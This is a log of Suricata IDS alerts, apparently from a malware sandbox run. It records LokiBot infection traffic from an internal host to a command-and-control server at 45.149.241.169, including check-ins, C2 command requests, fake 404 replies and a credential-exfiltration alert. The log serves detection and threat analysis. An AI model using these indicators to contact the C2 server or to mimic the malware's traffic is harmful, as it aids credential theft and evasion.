Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49755 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49732
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49737 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49738 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49739 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49737 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49804 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49739 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49773 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49770 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49729 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.10:49707 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49797 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49736
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49797 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49749 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49722 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49738 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49722 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49738 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49754
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49722 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49757
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49804 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49773 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49771 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49771 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49773 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49770 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49773 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49770 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49771 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49805 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49805 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49805 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49729 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49749
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49802 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49729 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49738 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49755
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49722 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49759 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49759 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49729 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49740 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49729 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49728 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49728 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49728 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49772 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49774 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49772 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49781 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49770 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49795
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49770 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49803 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49804 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49804 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49794 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49794 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49794 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49804
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49775 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49775 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49775 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49739
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49770
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49775 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49775 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49781 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49781 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49776 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49776 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49776 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49802 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49802 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49776 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49776 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49802 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49802 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49779 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49779 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49771 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49779 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49798 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49759 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49771 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49798 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49798 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49779 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49779 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49740 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49740 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49729
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49772 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49798 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49740 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49791 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49798 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49794 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49794 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49794
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49798
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49747 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49747 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49747 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49747 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49747 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49747
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49781
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49762 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49762 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49762 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49809 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49809 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49809 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49762 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49762 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49801 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49801 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49801 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49805 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49805 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49762
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49723
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49738 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49737
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49797 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49797 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49769 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49769 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49772 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49772 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49740 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49803 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49792 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49779
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49722
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49809 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49809 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49738
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49769 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49769 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49769 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49802
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49709 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49709 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49709 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49728 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49728 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49745 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49728
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49745 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49745 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49792 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49750 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49771
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49774
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49745 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49797
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49769
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49745 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49763 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49763 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49763 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49780 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49808 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49780 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49780 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49809
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49763 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49763 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49799 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49778 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49799 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49799 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49785 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49785 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49765 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49765 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49792 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49724 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49773
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49740
